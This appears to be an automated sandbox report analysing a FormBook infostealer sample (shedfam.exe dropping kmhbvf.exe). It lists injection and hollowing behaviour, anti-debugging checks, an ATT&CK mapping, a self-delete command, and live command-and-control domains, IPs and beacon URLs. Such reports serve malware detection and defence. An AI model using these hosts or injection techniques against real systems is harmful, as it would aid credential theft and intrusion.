Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_00F3C2FF
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3494A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00F3494A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_00F3CD9F
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3CD14 FindFirstFileW,FindClose,	1_2_00F3CD14
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00F3F5D8
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00F3F735
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_00F3FA36
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00F33CE2

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F4C6D9 LoadLibraryA,GetProcAddress,

1_2_00F4C6D9

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_03AF0149 mov eax, dword ptr fs:[00000030h]	1_2_03AF0149
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_03AF0005 mov eax, dword ptr fs:[00000030h]	1_2_03AF0005
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_03AF0019 mov eax, dword ptr fs:[00000030h]	1_2_03AF0019
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_03AF007A mov eax, dword ptr fs:[00000030h]	1_2_03AF007A

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00EE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00EE5240

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F05CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_00F05CAC

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

1_2_00F288CD

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 2_2_00409AB0 rdtsc

2_2_00409AB0

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 2_2_0040ACF0 LdrLoadDll,

2_2_0040ACF0

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F445D5 BlockInput,

1_2_00F445D5

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00EFA385
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EFA354 SetUnhandledExceptionFilter,	1_2_00EFA354
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00EFA385

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 18.167.242.213 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.100.63.146 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.111lll.xyz
Source: C:\Windows\explorer.exe	Domain query: www.73129.vip

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\kmhbvf.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 120000

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Thread register set: target process: 3452	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Thread register set: target process: 3452	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Thread register set: target process: 3452	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F31AC6 SendInput,keybd_event,

1_2_00F31AC6

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F29369 LogonUserW,

1_2_00F29369

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00EE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00EE5240

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F351E2 mouse_event,

1_2_00F351E2

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F34F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_00F34F1C

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

1_2_00F288CD

Source: shedfam.exe, 00000000.00000002.258371717.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000000.244367658.0000000000F86000.00000002.00000001.01000000.00000004.sdmp, kmhbvf.exe, 00000002.00000000.249911083.0000000000F86000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: kmhbvf.exe, explorer.exe, 00000003.00000000.303545502.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.271730124.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.299459459.0000000006770000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.257495266.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.321537541.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00EF885B cpuid

1_2_00EF885B

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F10030 GetLocalTime,__swprintf,

1_2_00F10030

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F0416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

1_2_00F0416A

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F10722 GetUserNameW,

1_2_00F10722

Source: C:\Users\user\Desktop\shedfam.exe

Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_0040324F

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: kmhbvf.exe	Binary or memory string: WIN_81
Source: kmhbvf.exe	Binary or memory string: WIN_XP
Source: kmhbvf.exe	Binary or memory string: WIN_XPe
Source: kmhbvf.exe	Binary or memory string: WIN_VISTA
Source: kmhbvf.exe	Binary or memory string: WIN_7
Source: kmhbvf.exe	Binary or memory string: WIN_8
Source: kmhbvf.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F4696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		1_2_00F4696E
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F46E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		1_2_00F46E32

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
2 Valid Accounts	12 Native API	2 Valid Accounts	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 Credential API Hooking	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	4 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	2 Valid Accounts	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Credential API Hooking	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	21 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	1 System Network Connections Discovery	SMB/Windows Admin Shares	21 Input Capture	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	512 Process Injection	1 Software Packing	NTDS	2 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Rootkit	LSA Secrets	115 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Valid Accounts	Cached Domain Credentials	151 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	2 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	3 Process Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	512 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 System Owner/User Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	1 Remote System Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	1 System Network Configuration Discovery	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\kmhbvf.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\kmhbvf.exe	2%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.0.kmhbvf.exe.400000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.shedfam.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File
1.2.kmhbvf.exe.3b00000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
2.2.kmhbvf.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.0.shedfam.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File

Domains

Source	Detection	Scanner	Label	Link
www.autonomaat.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.111lll.xyz/sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy	0%	Avira URL Cloud	safe
http://www.73129.vip/sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy	0%	Avira URL Cloud	safe
www.justbeand.com/sk19/	0%	Avira URL Cloud	safe
http://gcsahrz23.xyz/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fbcuj92a.n.sktcks.com	18.167.242.213	true	true		unknown
www.autonomaat.com	54.67.42.145	true	false	1%, Virustotal, Browse	unknown
www.73129.vip	103.100.63.146	true	true		unknown
www.111lll.xyz	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.111lll.xyz/sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy	true	Avira URL Cloud: safe	unknown
www.justbeand.com/sk19/	true	Avira URL Cloud: safe	low
http://www.73129.vip/sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, kmhbvf.exe, 00000002.00000000.252060134.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, explorer.exe, 00000003.00000000.294072289.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.305847313.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.257903286.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333339547.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.280708898.000000000F276000.00000004.00000001.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	false		high
http://nsis.sf.net/NSIS_Error	shedfam.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	shedfam.exe	false		high
http://gcsahrz23.xyz/	NETSTAT.EXE, 0000000D.00000002.518369394.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
18.167.242.213	fbcuj92a.n.sktcks.com	United States		16509	AMAZON-02US	true
103.100.63.146	www.73129.vip	China		136970	YISUCLOUDLTD-AS-APYISUCLOUDLTDHK	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756041
Start date and time:	2022-11-29 15:11:10 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	shedfam.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/5@3/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 30.3% (good quality ratio 28.2%) Quality average: 70.2% Quality standard deviation: 31.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 81 Number of non-executed functions: 318
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.100.63.146	SecuriteInfo.com.Exploit.CVE-2018-0798.4.18556.26388.rtf	Get hash	malicious	Browse	www.73129.vip/sk19/?fDHP=3fkXYR9hz&SJElJ=QEAmWZfWRmzsIdK09pUtXBuIHlMFTiZNz3ekHIA6BAt73q/fTcGY86u1uRL9kDNcPWyWIQ==
103.100.63.146	C0kXpdDmus.exe	Get hash	malicious	Browse	www.3559.fyi/pdrq/?-ZkP=tyrJo2DsLqAFCkyHUXQ1b8K3fbGeVX4/XbO/LpG7QkepypcVi9hBkcMg9USsvw3+2JPE&5j=7nRhzPYXe2

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.73129.vip	SecuriteInfo.com.Exploit.CVE-2018-0798.4.18556.26388.rtf	Get hash	malicious	Browse	103.100.63.146
www.autonomaat.com	O1xUBS7Wyu.exe	Get hash	malicious	Browse	54.67.93.101

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	https://protect-za.mimecast.com/s/uPmFCMjBBwFvRZPBIwJQlBT?domain=s3.amazonaws.com	Get hash	malicious	Browse	52.217.198.0
	2022-571-GLS.exe	Get hash	malicious	Browse	75.2.81.221
	c7oqCiKzbF.exe	Get hash	malicious	Browse	52.217.136.121
	http://xmas-art.ru/fo/ufmavtiwaehat-sejautfoja/haotwaep/376197/?T=44g47k0c-8q-1q1QZ44igflammatiojb&vfilclszdwwrqimq5-t-nsnba=contyasseursSZ6J2	Get hash	malicious	Browse	108.138.47.14
	http://bitbucket.org/fgsdsaewrewf/downsreps1/downloads/git-scm.zip	Get hash	malicious	Browse	104.192.141.1
	Scan-29-11-2022.xls	Get hash	malicious	Browse	99.83.154.118
	ABJLRCJkcK.exe	Get hash	malicious	Browse	52.213.209.223
	j7PXQpqMtK.exe	Get hash	malicious	Browse	3.69.157.220
	H7mlOrX044.exe	Get hash	malicious	Browse	52.48.35.88
	https://ipfs.io/ipfs/QmZscYPiZiEyUufsiTp73rjGySUVKx6mbYrEnns9n7DNVh?filename=ownredirectautoweb.html#news@pitchfork.com	Get hash	malicious	Browse	54.77.145.5
	GyKpRhKQY1.elf	Get hash	malicious	Browse	176.34.218.154
	kTK22xqEq6.elf	Get hash	malicious	Browse	199.47.130.12
	8kH56VSq58.elf	Get hash	malicious	Browse	65.1.39.239
	https://app.smartsheet.com/b/download/att/1/7953430800033668/2d1kcfy3a3mgsxdrbomrc9v3jo	Get hash	malicious	Browse	52.216.141.30
	https://linktfetn.cc	Get hash	malicious	Browse	65.9.44.9
	payment_copy4_receipt.exe	Get hash	malicious	Browse	75.2.115.196
	Check#33743_pymntCopy_pdf.htm	Get hash	malicious	Browse	3.72.140.173
